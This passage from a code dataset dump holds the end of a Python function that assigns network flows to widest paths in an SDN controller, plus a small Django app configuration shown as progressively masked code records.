mcfpox.controller.lib.Flow objects representing\n 5-tuples of flows to route through the network\n\n Returns:\n A dict mapping each flow in flows to a valid path through the graph.\n The path is expressed as a list of mcfpox.controller.lib.Hop objects.\n If no valid path can be found, the value for that entry is None.\n \"\"\"\n\n G = graph.copy()\n rules = {}\n flows.sort(key=lambda a: a[1], reverse=True)\n\n for flow,demand in flows:\n src = get_host_from_ip(G, flow.nw_src)\n dst = get_host_from_ip(G, flow.nw_dst)\n\n if not (src and dst):\n continue\n if not (src in G.nodes() and dst in G.nodes()):\n continue\n\n path = widest_path(G, src, dst)\n\n hops = []\n for a,b in pairwise(path):\n hops.append(Hop(dpid=int(a[1:]), port=G.edge[a][b]['port']))\n G.edge[a][b]['capacity'] -= demand\n G.edge[b][a]['capacity'] -= demand\n\n rules[flow] = hops\n\n return rules\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.apps import AppConfig
class PersianConfig(AppConfig):
name = 'persian'
|
normal
|
{
"blob_id": "6b0d1de4c77841f20670331db3332cf87be7ad84",
"index": 3931,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PersianConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PersianConfig(AppConfig):\n name = 'persian'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass PersianConfig(AppConfig):\n name = 'persian'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.